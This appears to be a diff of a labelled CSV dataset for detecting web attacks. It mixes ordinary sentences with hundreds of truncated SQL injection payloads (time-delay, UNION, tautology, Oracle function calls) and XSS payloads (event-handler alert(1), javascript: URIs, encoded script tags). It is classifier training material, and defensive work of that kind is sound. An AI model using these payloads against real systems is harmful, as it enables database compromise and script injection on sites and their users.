+"1"" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ",2,SQLi,13594 +"<style>@keyframes x{}</style><font style=""animatio",1,XSS,7381 +"<rtc draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,1756 +Select your complete.,0,normal,25005 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9#",2,SQLi,10541 +"<template onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5375 +1' ) as jysm where 8961 = 8961 union all select nu,2,SQLi,15548 +Select gin.,0,normal,24515 +"<;STYLE>;.XSS{background-image:url("";javascript:al",1,XSS,1615 +<dd onpointerdown=alert(1)>XSS</dd>,1,XSS,5832 +1' ) as ihsc where 3978 = 3978,2,SQLi,18620 +"select the device in iTunes, then select Version a",0,normal,25598 +Select a painting for your living room.,0,normal,24059 +<base id=x tabindex=1 onfocusin=alert(1)></base>,1,XSS,2017 +"1"" and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,19439 +An impartial committee to select the final list of,0,normal,26371 +Insert card.,0,normal,23021 +"<command onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5759 <script\x0D>javascript:alert(1)</script>,1,XSS,604 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5330 -I want to select a movie for tonight.,0,normal,23802 +"<div draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,5332 +Join for dinner.,0,normal,22798 &#34;&#62;<svg><style>{-o-link-source&colon;'<body,1,XSS,866 -select ( case when ( 5847 = 2826 ) then 5847 else ,2,SQLi,21119 -1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,16628 -1 ) ) ) and 8635 = ( select count ( * ) from gener,2,SQLi,19413 -"-4739' ) ) union all select 6585,6585,6585,6585,65",2,SQLi,18102 -Create blog.,0,normal,23080 -1' ) ) ) and 8635 = ( select count ( * ) from gene,2,SQLi,16866 -seriously seriously are realizing league of legend,0,normal,26481 -) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11221 -"<details draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,4831 -"1"" ) as tqxa where 6751 = 6751 or ( select 2* ( if",2,SQLi,21788 -<ruby onpointerout=alert(1)>XSS</ruby>,1,XSS,5345 -The facts of the problem would all appear covered ,0,normal,25451 -1'+ ( select ijck where 9961 = 9961 or ( select 2*,2,SQLi,15317 -1'+ ( select ntym where 4750 = 4750,2,SQLi,22469 -( select ( case when ( 6581 = 6581 ) then 1 else c,2,SQLi,12798 -select ( case when ( 1812 = 2446 ) then 1812 else ,2,SQLi,17158 -"-8256"" ) ) ) or 6872 = 6872 and ( ( ( ""lrtu"" = ""lr",2,SQLi,15456 -"1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( ",2,SQLi,22017 -<blink onpointerenter=alert(1)>XSS</blink>,1,XSS,3874 +-8010' or ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf,2,SQLi,21117 +1 ) as ozga where 4002 = 4002 and 6969 = ( select ,2,SQLi,16630 +1 where 7642 = 7642 or 2633 = dbms_pipe.receive_me,2,SQLi,19411 +-1257' ) order by 1#,2,SQLi,18100 +Delete apps.,0,normal,23077 +1'|| ( select 'xbvz' from dual where 1632 = 1632 u,2,SQLi,16868 +""" From the next screen, you'll select ""It's abusiv",0,normal,26478 +#ERROR!,2,SQLi,11223 +<header onpointerup=alert(1)>XSS</header>,1,XSS,4833 +Where can I access it?,0,normal,23473 +<style>:target {color: red;}</style><iframe id=x s,1,XSS,5347 +The Financial Select Sector ETF (XLF) and Industri,0,normal,25448 +1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,15319 +Sort the scattered leaves.,0,normal,22618 +-2307' ) ) ) or 6872 = 6872 and ( ( ( 'fyok' like ,2,SQLi,12800 +select ( case when ( 8375 = 8318 ) then 8375 else ,2,SQLi,17160 +select ( case when ( 2056 = 1917 ) then 2056 else ,2,SQLi,15458 +"1' ) where 5799 = 5799 union all select null,null,",2,SQLi,22015 +<bdi id=x tabindex=1 onfocus=alert(1)></bdi>,1,XSS,3876 "<iframe sandbox src=""//portswigger-labs.net""></ifr",1,XSS,180 --3750'+ ( select alpu where 3911 = 3911 order by 1,2,SQLi,19201 -<a id=x tabindex=1 onbeforedeactivate=alert(1)></a,1,XSS,7437 -"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,20093 -<image2 onpointerup=alert(1)>XSS</image2>,1,XSS,5959 -1%' or 5286 = ( select count ( * ) from all_users ,2,SQLi,14111 -"<audio draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,1801 -1%' ) and 8312 = dbms_pipe.receive_message ( chr (,2,SQLi,20001 -"-2009%' union all select 1991,1991#",2,SQLi,14649 -1'+ ( select lhtn where 8484 = 8484 and char ( 111,2,SQLi,15083 -"<wbr onmouseenter=""alert(1)"">test</wbr>",1,XSS,6039 -<em onpointerenter=alert(1)>XSS</em>,1,XSS,8222 -select,0,normal,26608 -"1%"" ) and 3754 = ( select upper ( xmltype ( chr ( ",2,SQLi,13896 -"<del onclick=""alert(1)"">test</del>",1,XSS,2802 -1' where 2690 = 2690,2,SQLi,18888 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2923 -Select tequila.,0,normal,24517 -1' in boolean mode ) union all select null--,2,SQLi,12857 -Where's your SQL function?,0,normal,23431 -"><h1><IFRAME width=420"" height=""315"" SRC=""http://w",1,XSS,1246 -"1 and elt ( 3172 = 7243,7243 )",2,SQLi,21544 -"<br draggable=""true"" ondragend=""alert(1)"">test</br",1,XSS,4054 -<style>:target {color:red;}</style><wbr id=x style,1,XSS,5932 -"<dir oncut=""alert(1)"" contenteditable>test</dir>",1,XSS,3240 +1' ) as bvvl where 9818 = 9818 and ( select 9067 f,2,SQLi,19199 +"<canvas draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,7439 +Order a vegetarian dish.,0,normal,22632 +"<style>@keyframes x{}</style><u style=""animation-n",1,XSS,5961 +1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,14113 +"<dd onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,1802 +Sort the scattered books.,0,normal,22578 +1%' ) and 5556 = ( select count ( * ) from all_use,2,SQLi,14651 +"-7715' ) union all select 4830,4830,4830,4830,4830",2,SQLi,15085 +<marquee onpointerleave=alert(1)>XSS</marquee>,1,XSS,6041 +"<del draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8224 +select,0,normal,26605 +"1' ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,13898 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2803 +"-4095' ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,18886 +"<picture onkeydown=""alert(1)"" contenteditable>test",1,XSS,2924 +Select vodka.,0,normal,24514 +"1"" ) ) as tgwp where 9405 = 9405",2,SQLi,12859 +"{""id"":null,""name"":""tank""}",0,normal,27557 +"><h1><iframe width=420"" height=""315"" src=""http://w",1,XSS,1247 +-9100 ) or 8792 = 9550--,2,SQLi,21542 +"<canvas onkeypress=""alert(1)"" contenteditable>test",1,XSS,4056 +"<blockquote onmouseleave=""alert(1)"">test</blockquo",1,XSS,5934 +<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><,1,XSS,3242 <body onwheel=alert(1)>,1,XSS,109 -1'+ ( select nash where 4159 = 4159 union all sele,2,SQLi,20780 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,16151 -1 where 7882 = 7882,2,SQLi,19981 -"1"" union all select null,null,null,null,null,null,",2,SQLi,14729 -1' ) ) as cyom where 2318 = 2318 and 7533 = 7533--,2,SQLi,19120 +"-1333"" ) ) union all select 2376,2376,2376,2376,23",2,SQLi,20778 +1'|| ( select 'mobv' from dual where 6338 = 6338,2,SQLi,16153 +1 ) or sleep ( 5 ) #,2,SQLi,19979 +-9087 or 3038 = 3038,2,SQLi,14731 +"{""id"":null,""name"":""CharizardMega Charizard Y""}",0,normal,27474 +1') WAITFOR DELAY '0:0:5' AND ('1337'='1337,2,SQLi,11322 +"1' ) ) union all select null,null,null,null,null,n",2,SQLi,22165 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3537 +<dfn onpointerup=alert(1)>XSS</dfn>,1,XSS,4397 +SELECT pg_sleep(5);,2,SQLi,11333 +1 ) and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,14969 +The Disaster Artist arrives in select theaters Fri,0,normal,25460 +"1"" ) as uyms where 6210 = 6210 and 6055 = ctxsys.d",2,SQLi,17568 +<dd id=x tabindex=1 onfocusin=alert(1)></dd>,1,XSS,3570 +"{""id"":null,""firstName"":""Marziah"",""lastName"":""Mokht",0,normal,26880 +"<noscript onmouseover=""alert(1)"">test</noscript>",1,XSS,7436 +select,0,normal,26637 +1' ) ) as fwxq where 9935 = 9935 or exp ( ~ ( sele,2,SQLi,19973 1 WAITFOR DELAY '0:0:5'-- 1337,2,SQLi,11320 -""" Applicants are not allowed to select ""all of the",0,normal,26479 -"<span onclick=""alert(1)"">test</span>",1,XSS,3535 -"<address draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,4395 -or SELECT pg_sleep(5);,2,SQLi,11331 -"1"" ) ) ) or 2367 = ( select count ( * ) from rdb$f",2,SQLi,14967 -The crucial verb in SQL--Structured Query Language,0,normal,25463 -1 ) ) as wmxa where 6485 = 6485 and 8148 = like ( ,2,SQLi,17566 -"<style>@keyframes x{}</style><legend style=""animat",1,XSS,3568 --5286' or 6783 = 1233,2,SQLi,17929 -<code onblur=alert(1) tabindex=1 id=x></code><inpu,1,XSS,7434 --7452 where 2224 = 2224 or 4747 = dbms_utility.sql,2,SQLi,18295 -"1%"" ) ) and ( select * from ( select ( sleep ( 5 )",2,SQLi,19975 -1 WAITFOR DELAY '0:0:5'--,2,SQLi,11318 -"<element oncopy=""alert(1)"" contenteditable>test</e",1,XSS,5495 -I'll select chocolate.,0,normal,24794 -1' where 6359 = 6359 and ( 3020 = 3020 ) *6703--,2,SQLi,17358 -"<menu onclick=""alert(1)"">test</menu>",1,XSS,4300 -"1%' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d",2,SQLi,18129 -"<u draggable=""true"" ondragenter=""alert(1)"">test</u",1,XSS,5873 -"<label onkeydown=""alert(1)"" contenteditable>test</",1,XSS,4839 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7599 -"<sub draggable=""true"" ondragend=""alert(1)"">test</s",1,XSS,1790 -1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,22144 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13740 -"1"" ) ) or 4411 = ( select count ( * ) from sysuser",2,SQLi,13663 -"<style>@keyframes x{}</style><image style=""animati",1,XSS,7196 -1' ) ) and 8407 = ( select count ( * ) from genera,2,SQLi,18339 -begin if ( 5624 = 5624 ) then dbms_lock.sleep ( 5 ,2,SQLi,14747 -"<aside onmouseover=""alert(1)"">test</aside>",1,XSS,7465 -<marquee onstart=alert(1)>,1,XSS,9231 -Where's the urgent care center?,0,normal,23624 -"<style>@keyframes x{}</style><xmp style=""animation",1,XSS,6331 +<svg onpointerdown=alert(1)>XSS</svg>,1,XSS,5497 +"Select, don't hesitate.",0,normal,24791 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,17360 +"<A HREF=""http://0x42.0x0000066.0x7.0x93/""></A>",1,XSS,4302 +1' ) ( select ( case when ( 4587 = 4587 ) then reg,2,SQLi,18127 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5875 +"<data oncut=""alert(1)"" contenteditable>test</data>",1,XSS,4841 +"<tbody onmouseenter=""alert(1)"">test</tbody>",1,XSS,7601 +"<dialog draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,1791 +"-2518' union all select 6818,6818,6818,6818,6818,6",2,SQLi,22142 +"1', ( select ( case when ( 1902 = 5536 ) then 1 el",2,SQLi,13742 +-3956' ) or ( 8459 = 8459 ) *4906 and ( 'rflo' lik,2,SQLi,13665 +"<footer onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7198 +"1"" where 4684 = 4684 union all select null,null,nu",2,SQLi,18337 +1 ) where 4573 = 4573,2,SQLi,14749 +"<embed onmousedown=""alert(1)"">test</embed>",1,XSS,7467 +<math><brute href=javascript:alert(1)>click,1,XSS,9233 +Where's the counseling office?,0,normal,23621 +"<object onkeypress=""alert(1)"" contenteditable>test",1,XSS,6333 "<audio oncanplay=alert(1)><source src=""validaudio.",1,XSS,11 -""")) or sleep(__TIME__)=""",2,SQLi,10840 -<style>@keyframes slidein {}</style><address style,1,XSS,5869 -<p onpointerdown=alert(1)>XSS</p>,1,XSS,8856 -1 ) as nmlm where 9872 = 9872,2,SQLi,17811 -Select your choice.,0,normal,24883 -select * from users where id = '1' *$ . or 1 = 1 -,2,SQLi,11458 -Select obtain.,0,normal,24560 -1 where 1576 = 1576,2,SQLi,17165 -1 ) ) rlike sleep ( 5 ) #,2,SQLi,20753 -1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ,2,SQLi,22207 -1%' ) ) rlike sleep ( 5 ) and ( ( '%' = ',2,SQLi,15463 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10586 -"1"" where 5062 = 5062",2,SQLi,19449 -<s onpointerover=alert(1)>XSS</s>,1,XSS,8516 -"><script>alert(XSS by \nxss"")</script>><marquee><h",1,XSS,1345 +""");waitfor delay '0:0:__TIME__'--",2,SQLi,10842 +"<dialog oncut=""alert(1)"" contenteditable>test</dia",1,XSS,5871 +"<dt draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,8858 +-3161' ) or 8501 = 1796,2,SQLi,17813 +Select your significance.,0,normal,24880 +select * from users where id = 1 or ( \+ ) = 1 or ,2,SQLi,11460 +Select purchase.,0,normal,24557 +"1"" ) ) as tngu where 3644 = 3644 union all select ",2,SQLi,17167 +Select the right answer.,0,normal,24307 +"1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch",2,SQLi,22205 +1 ) ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,15465 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10588 +"1' ) where 4778 = 4778 and elt ( 3114 = 3114,sleep",2,SQLi,19447 +"<link onmouseout=""alert(1)"">test</link>",1,XSS,8518 +"""></title><script>alert(""XSS by \nxss"")</script>><",1,XSS,1346 "<body onFocus body onFocus=""javascript:javascript:",1,XSS,373 -"1' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,15807 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,15809 <script itworksinallbrowsers>/*<script* */alert(1),1,XSS,910 -"1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 )",2,SQLi,14916 -select,0,normal,26590 -1 where 7425 = 7425 rlike ( select ( case when ( 4,2,SQLi,16881 -"You simply take lots of photos, then select your f",0,normal,25066 -1' ) as viex where 6242 = 6242 and 6537 = dbms_pip,2,SQLi,20512 --6129 ) as vuze where 1565 = 1565 or ( 8459 = 8459,2,SQLi,17691 -"-9392 ) ) or elt ( 1032 = 1032,3623 ) and ( ( 2975",2,SQLi,16211 -select * from users where id = '1' <@$_ union sele,2,SQLi,11663 -"1"" ) where 9062 = 9062",2,SQLi,21440 -"select * from users where id = 1 or ""]{"" or 1 = 1 ",2,SQLi,11416 -></iframe><script>alert(`TEXT YOU WANT TO BE DISPL,1,XSS,1245 -"<IMG SRC=x onkeypress=""alert(String.fromCharCode(8",1,XSS,1196 -<animate onpointermove=alert(1)>XSS</animate>,1,XSS,2991 -"-8166"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5",2,SQLi,17808 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,15705 +"1%"" ) ) and 9660 = ( select count ( * ) from all_u",2,SQLi,14918 +1'+ ( select blbd where 7451 = 7451 or ( select 91,2,SQLi,19261 +1%' ) ) ) order by 1--,2,SQLi,16883 +Lowe's: Up to 30% off select patio furniture and o,0,normal,25903 +"1"" ) as vdim where 1296 = 1296",2,SQLi,20510 +"1 where 4968 = 4968 or updatexml ( 1808,concat ( 0",2,SQLi,17693 +1 and ( 3437 = 2271 ) *2271,2,SQLi,16213 +select * from users where id = 1 <@. or 1 = 1 -- 1,2,SQLi,11665 +Select the best caterer.,0,normal,24370 +"select * from users where id = 1 or ""$["" or 1 = 1 ",2,SQLi,11418 +"><h1><IFRAME width=420"" height=""315"" SRC=""http://w",1,XSS,1246 +"<IMG SRC=x onkeyup=""alert(String.fromCharCode(88,8",1,XSS,1197 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2992 +"-8419 ) where 8692 = 8692 union all select 8692,86",2,SQLi,17810 +"1 where 7240 = 7240 or 6979 = like ( 'abcdefg',upp",2,SQLi,15707 "<IMG SRC=""jav&#x0D;ascript:alert('XSS');"">",1,XSS,257 -1' ) and 3754 = ( select upper ( xmltype ( chr ( 6,2,SQLi,16366 -"<style>@keyframes x{}</style><object style=""animat",1,XSS,8206 -He is entitled to consecrate all the bishops withi,0,normal,26118 -"-5744 ) union all select 3617,3617,3617,3617,3617,",2,SQLi,14770 -"When she does tour, it's usually very little and s",0,normal,25153 -"1"" where 5517 = 5517 and 7756 = dbms_utility.sqlid",2,SQLi,22152 -Nina: 30 percent off select pump styles; through M,0,normal,25869 -"To create a bookmark for the current solution, sel",0,normal,25277 -1' ) as asjj where 1721 = 1721 union all select nu,2,SQLi,17617 -Randomly select a flower.,0,normal,24358 -"<keygen onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,4785 -"1', ( select ( case when ( 3902 = 3902 ) then ( se",2,SQLi,13664 -"<sub onmousedown=""alert(1)"">test</sub>",1,XSS,7523 -"<set attributeName=""xlink:href"" begin=""accessKey(b",1,XSS,9305 --8684' where 9820 = 9820 or 6844 = 5105,2,SQLi,15871 -1'|| ( select 'zwcp' where 3333 = 3333,2,SQLi,17993 -"-9379 ) or make_set ( 9354 = 9354,7185 ) and ( 921",2,SQLi,20729 -<hgroup onpointerdown=alert(1)>XSS</hgroup>,1,XSS,5913 -Select your confirm.,0,normal,24960 -1' ) ) and exp ( ~ ( select * from ( select concat,2,SQLi,13887 -1'||'asd'||',2,SQLi,22520 -"1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,19514 -"1"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,16331 -1%' ) or 1022 = ( select count ( * ) from all_user,2,SQLi,19031 -1 where 9361 = 9361 and 7478 = 9170--,2,SQLi,20395 -&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&ap,1,XSS,1380 -"<ul onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,7690 -"document.getElementsByClassName(""example"")",1,XSS,3689 -1'|| ( select 'xemx' from dual where 4683 = 4683 o,2,SQLi,18518 -"Click on your profile picture, and then select ""Yo",0,normal,26277 -1' ) and 6510 = ( select count ( * ) from sysusers,2,SQLi,15660 -"<dfn onmouseout=""alert(1)"">test</dfn>",1,XSS,3791 -<nav onpointerleave=alert(1)>XSS</nav>,1,XSS,8813 -1' ) ) ) or sleep ( 5 ) #,2,SQLi,16183 +1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_,2,SQLi,16368 +"<ruby onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,8208 +"He not merely did nothing of the kind, but on the ",0,normal,26115 +1' ) or sleep ( 5 ) #,2,SQLi,14772 +"1"" ) as bksv where 5375 = 5375",2,SQLi,18764 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,22150 +Nor is it difficult to imagine the probable course,0,normal,25866 +"To do so, use the remote to select the app.",0,normal,25274 +"1, ( select ( case when ( 8674 = 7896 ) then 1 els",2,SQLi,17619 +"-7007 ) union all select 6704,6704--",2,SQLi,19600 +"<textarea onclick=""alert(1)"">test</textarea>",1,XSS,4787 +"1,iif ( 1440 = 4612,1,1/0 )",2,SQLi,13666 +"<hr draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7525 +"<set attributeName=""xlink:href"" begin=""accessKey(d",1,XSS,9307 +"1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,15873 +A select band of just 29 talking heads featured in,0,normal,26424 +I want to select a dress for the upcoming party.,0,normal,23850 +"<table oncontextmenu=""alert(1)"">test</table>",1,XSS,5915 +Select your announce.,0,normal,24957 +"-9699"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""dufs""",2,SQLi,13889 +select case when 7634 = 3954 then 1 else null end-,2,SQLi,19298 +"1"" ) where 8878 = 8878 or ( select 9173 from ( sel",2,SQLi,19512 +1'|| ( select 'pzto' from dual where 7338 = 7338 a,2,SQLi,16333 +"1"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr",2,SQLi,19029 +1' in boolean mode ) and ( 3020 = 3020 ) *6703#,2,SQLi,20393 +&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascr,1,XSS,1381 +<svg><canvas onload=alert(1)></canvas>,1,XSS,7692 +<br onpointerout=alert(1)>XSS</br>,1,XSS,3691 +"1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then",2,SQLi,18516 +Click your account's profile photo and select Sett,0,normal,26274 +1' ) ) ) order by 1--,2,SQLi,15662 +"<br onmouseup=""alert(1)"">test</br>",1,XSS,3793 +<frameset id=x tabindex=1 onbeforedeactivate=alert,1,XSS,8815 +-5229' ) ) as tkqp where 9253 = 9253 or 9323 = 932,2,SQLi,16185 "<img \x47src=x onerror=""javascript:alert(1)"">",1,XSS,653 -select,0,normal,26618 -"select * from users where id = 1 or "" ( ) "" or 1 =",2,SQLi,11666 -1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,18099 -"<blink onpaste=""alert(1)"" contenteditable>test</bl",1,XSS,5329 -"<nextid onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7220 -Select spoon.,0,normal,24528 -and sleep(5) and '1'='1,2,SQLi,11163 +select,0,normal,26615 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11668 +-7442 ) or 3391 = 7492,2,SQLi,18097 +"<noframes onbeforepaste=""alert(1)"" contenteditable",1,XSS,5331 +"<blink onkeydown=""alert(1)"" contenteditable>test</",1,XSS,7222 +Select mug.,0,normal,24525 +) AND SLEEP(5)#,2,SQLi,11165 <video controls><source src=validvideo.mp4 type=vi,1,XSS,13 -<head id=x tabindex=1 onfocusin=alert(1)></head>,1,XSS,6153 --- &password =,2,SQLi,11664 -"<style>@keyframes x{}</style><samp style=""animatio",1,XSS,2811 -"<style>@keyframes x{}</style><time style=""animatio",1,XSS,2690 -and sleep 5 and '1'='1,2,SQLi,11162 -"-8364' ) union all select 4732,4732,4732,4732,4732",2,SQLi,13479 -"-4381 or make_set ( 6118 = 3095,3095 ) # lkcr",2,SQLi,20481 -1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,12617 -"?alert(1)"",",1,XSS,9859 -"1' where 6905 = 6905 union all select null,null,nu",2,SQLi,21884 --5859 ) as ernq where 8394 = 8394 union all select,2,SQLi,12364 -Whether you want to be creative and fit a circular,0,normal,25135 -<style>@im\port'\ja\vasc\ript:document.vulnerable=,1,XSS,1507 -"<header onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,4367 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10589 -"1"" ) where 6956 = 6956 or 8315 = ( select count ( ",2,SQLi,14393 -"<option onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2131 -"perl -e ';print "";&;<;SCR\0IPT>;alert("";XSS"";)<;/S",1,XSS,1649 -"1"" ) ) as gvpm where 5170 = 5170 or 5356 = ( selec",2,SQLi,15929 -"1"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,17115 -<button id=x tabindex=1 onactivate=alert(1)></butt,1,XSS,6767 --2992' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,21223 -<p onfocusout=alert(1) tabindex=1 id=x></p><input ,1,XSS,4145 -"<sup draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,8202 -From the mass of material comprised in the Koran -,0,normal,26159 -select ( case when ( 7980 = 3703 ) then 7980 else ,2,SQLi,14831 -"admin"") or (""1""=""1""/*",2,SQLi,9938 --7293' ) ) ) or 3038 = 3038,2,SQLi,13604 -It's also available in select European markets as ,0,normal,25944 -"1' ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,12598 -Calculate totals where needed.,0,normal,23463 -"1"" where 5796 = 5796 and sleep ( 5 ) #",2,SQLi,14964 -"Plus, save $70 on KitchenAid K400 blender with tem",0,normal,25770 -Men's tennis is no longer ruled by a select few.,0,normal,25880 -"<xml src=""javascript:document.vulnerable=true;"">",1,XSS,1544 -1 ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 wh,2,SQLi,12121 -1' ) as yuqv where 6007 = 6007 or extractvalue ( 1,2,SQLi,17541 -"First, you select a wallpaper platform — monitor o",0,normal,26187 -"-8046"" ) ) ) union all select 3126,3126,3126,3126,",2,SQLi,22337 -"select * from generate_series ( 7407,7407,case whe",2,SQLi,14409 -1 and 9412 = 6877#,2,SQLi,14894 +<div id=x tabindex=1 onactivate=alert(1)></div>,1,XSS,6155 +"select * from users where id = 1 or "" ( ) "" or 1 =",2,SQLi,11666 +<code onpointerover=alert(1)>XSS</code>,1,XSS,2812 +"<noscript oncopy=""alert(1)"" contenteditable>test</",1,XSS,2691 +and SELECT SLEEP(5); #,2,SQLi,11164 +"1"" ) ) as rfgu where 4880 = 4880 union all select ",2,SQLi,13481 +"-3913"" where 6085 = 6085 union all select 6085,608",2,SQLi,20479 +"1"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""eefg"" = ""eef",2,SQLi,12619 +"?asfunction:getURL,javascript:alert(1)//"",",1,XSS,9861 +"1"" ) where 6072 = 6072 and 2388 = benchmark ( 5000",2,SQLi,21882 +-6233' ) where 9820 = 9820 or 3038 = 3038,2,SQLi,12366 +While it was once fashionable to give your baby a ,0,normal,25132 +"<img STYLE=""xss:expr/*XSS*/ession(document.vulnera",1,XSS,1508 +"<svg onmouseout=""alert(1)"">test</svg>",1,XSS,4369 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10591 +"1', ( select ( case when ( 5433 = 5433 ) then 1 el",2,SQLi,14395 +<li onblur=alert(1) tabindex=1 id=x></li><input au,1,XSS,2132 +"<;IMG SRC=""; &;#14; javascript:alert(';XSS';);"";>;",1,XSS,1650 +1'+ ( select 'mdiu' where 4443 = 4443,2,SQLi,15931 +"1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,17117 +<li id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6769 +"1"" or sleep ( 5 ) and ""fbuo"" like ""fbuo",2,SQLi,21221 +<style>:target {color: red;}</style><div id=x styl,1,XSS,4147 +<element onblur=alert(1) tabindex=1 id=x></element,1,XSS,8204 +"From the top toolbar select ""Tools"" and then selec",0,normal,26156 +1' ) ) as namw where 1740 = 1740 or updatexml ( 18,2,SQLi,14833 +"admin"") or ""1""=""1""--",2,SQLi,9940 +1 where 3410 = 3410 or 7552 = ( select count ( * ),2,SQLi,13606 +It's important to select towels that are absorbent,0,normal,25941 +"-3637"" or ( 8459 = 8459 ) *4906",2,SQLi,12600 +"1"" or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,21362 +1' ) as ybuv where 9641 = 9641 union all select nu,2,SQLi,14966 +Pottery Barn: Up to 70% off select sale items; up ,0,normal,25767 +"Migne's texts are not always satisfactory, but sin",0,normal,25877 +"<xml id=""X""><a><b><script>document.vulnerable=true",1,XSS,1545 +1%' and 4386 = utl_inaddr.get_host_address ( chr (,2,SQLi,12123 +-6109 union all select 6784--,2,SQLi,17543 +1 ) ) as gdcg where 2329 = 2329 and 8407 = ( selec,2,SQLi,22399 +1%' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ,2,SQLi,22335 +-9143 ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,14411 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,14896 <body onscroll=alert(1)><div style=height:1000px><,1,XSS,33 -"<strike ondblclick=""alert(1)"">test</strike>",1,XSS,7188 -You can also select from a number of preset pictur,0,normal,25100 -Insert your passport details.,0,normal,22617 -Select a route for the hiking trail.,0,normal,24226 -1'|| ( select 'tfqg' from dual where 9862 = 9862 a,2,SQLi,12214 -Delete old photos.,0,normal,22780 -1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,17324 +<style>:target {color:red;}</style><acronym id=x s,1,XSS,7190 +You can always select the crib of your choice and ,0,normal,25097 +Where's the missing sock drawer?,0,normal,22614 +Select a fitness class to stay active.,0,normal,24223 +1' ) and ( 7603 = 3634 ) *3634,2,SQLi,12216 +"-3219"" ) order by 1--",2,SQLi,21224 -1490'|| ( select 'uzbm' from dual where 3181 = 31,2,SQLi,17326 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8750 +1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,17328 +<style>:target {color: red;}</style><progress id=x,1,XSS,8752 "<INPUT TYPE=""IMAGE"" SRC=""javascript:javascript:ale",1,XSS,746 -"<sup draggable=""true"" ondragend=""alert(1)"">test</s",1,XSS,4084 -"<iframe onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,2878 -"1%"" and char ( 120 ) ||char ( 106 ) ||char ( 117 )",2,SQLi,21012 -"admin"" or 